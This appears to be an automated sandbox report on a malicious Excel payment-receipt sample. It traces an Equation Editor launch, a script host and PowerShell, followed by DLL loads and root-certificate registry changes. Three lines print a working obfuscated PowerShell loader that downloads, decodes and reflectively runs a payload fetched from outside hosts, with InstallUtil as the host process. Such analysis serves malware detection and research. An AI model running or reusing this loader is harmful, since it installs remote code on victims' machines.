                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastroJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn2.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntdsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Comprobante de pago.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                  Source: Comprobante de pago.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastroJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_002721E7 push ebx; iretd 6_2_002721EA

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506AD URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035506AD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
